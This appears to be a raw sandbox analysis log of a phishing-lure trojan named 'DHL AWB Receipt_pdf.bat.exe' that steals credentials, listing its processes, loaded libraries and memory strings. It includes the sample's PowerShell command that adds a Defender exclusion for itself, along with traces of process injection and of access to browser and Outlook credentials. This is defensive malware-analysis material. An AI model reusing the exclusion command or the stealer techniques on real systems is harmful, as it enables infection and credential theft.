Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: String function: 04DB5130 appears 58 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: String function: 04DC7E54 appears 102 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: String function: 04D6B970 appears 280 times

Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1324413770.0000000006A1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerS vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1324413770.0000000006A1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000000.1290292380.000000000033C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehsYv.exe4 vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1323981001.0000000004ED0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1306240025.0000000002944000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1326732017.0000000006DF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1304461507.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506278244.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEhStorAuthn.exej% vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506888943.00000000014DD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe	Binary or memory string: OriginalFilenamehsYv.exe4 vs DHL AWB Receipt_pdf.bat.exe

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, Os3XH0xcZlZi6nQhId.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, Os3XH0xcZlZi6nQhId.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, rZbXDqsymswshlDjPg.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, rZbXDqsymswshlDjPg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, rZbXDqsymswshlDjPg.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/7@13/10

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL AWB Receipt_pdf.bat.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8568:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmlrxtpq.blq.ps1

Jump to behavior

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL AWB Receipt_pdf.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EhStorAuthn.exe, 00000006.00000003.1699845793.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3759000759.0000000002E91000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1699693880.0000000002E66000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL AWB Receipt_pdf.bat.exe	Virustotal: Detection: 44%
Source: DHL AWB Receipt_pdf.bat.exe	ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: EhStorAuthn.pdbGCTL source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506278244.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759335395.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506888943.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1508445982.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1505407554.00000000049E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL AWB Receipt_pdf.bat.exe, DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506888943.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1508445982.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1505407554.00000000049E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EhStorAuthn.pdb source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506278244.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759335395.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ncTysvq0lOMZbadjWC.exe, 00000005.00000000.1429494390.00000000004EF000.00000002.00000001.01000000.0000000A.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3758611583.00000000004EF000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, rZbXDqsymswshlDjPg.cs

.Net Code: vjQD1XPPp0 System.Reflection.Assembly.Load(byte[])

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: 0x83D19A31 [Mon Jan 30 15:56:33 2040 UTC]

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004071FF push C35DE58Bh; ret	4_2_00407237
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00403260 push eax; ret	4_2_00403262
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00409339 push ss; retf	4_2_0040933A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_00408395 push ss; ret	4_2_00408397
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004124E9 push eax; retf	4_2_004124EA
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040B528 pushad ; retf	4_2_0040B52A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0040D53D push esi; retf	4_2_0040D53E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004146A6 push cs; iretd	4_2_004146BC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_004097F6 push edi; ret	4_2_00409808
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013B225F pushad ; ret	4_2_013B27F9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013B27FA pushad ; ret	4_2_013B27F9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E09AD push ecx; mov dword ptr [esp], ecx	4_2_013E09B6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013B283D push eax; iretd	4_2_013B2858
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013B1344 push eax; iretd	4_2_013B1369
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_0381C323 push ss; ret	5_2_0381C325
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_0382863C push cs; iretd	5_2_0382864A
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_038285AA push ebp; iretd	5_2_038285AB
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_0381F4B6 pushad ; retf	5_2_0381F4B8
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_038214CB push esi; retf	5_2_038214CC
Source: C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\ncTysvq0lOMZbadjWC.exe	Code function: 5_2_03826477 push eax; retf	5_2_03826478
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_04D709AD push ecx; mov dword ptr [esp], ecx	6_2_04D709B6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CB82C5 pushad ; retf	6_2_02CB82C7
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CD4210 push ss; ret	6_2_02CD432A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CCC30E push ebx; iretd	6_2_02CCC30F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CB60D6 push ss; retf	6_2_02CB60D7
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CCC09D push ds; ret	6_2_02CCC0A7
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CC24C3 push edi; ret	6_2_02CC24C4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CB6593 push edi; ret	6_2_02CB65A5
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CBF286 push eax; retf	6_2_02CBF287
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CB5132 push ss; ret	6_2_02CB5134
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 6_2_02CC762A push edi; iretd	6_2_02CC7654

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: section name: .text entropy: 7.89354397649521

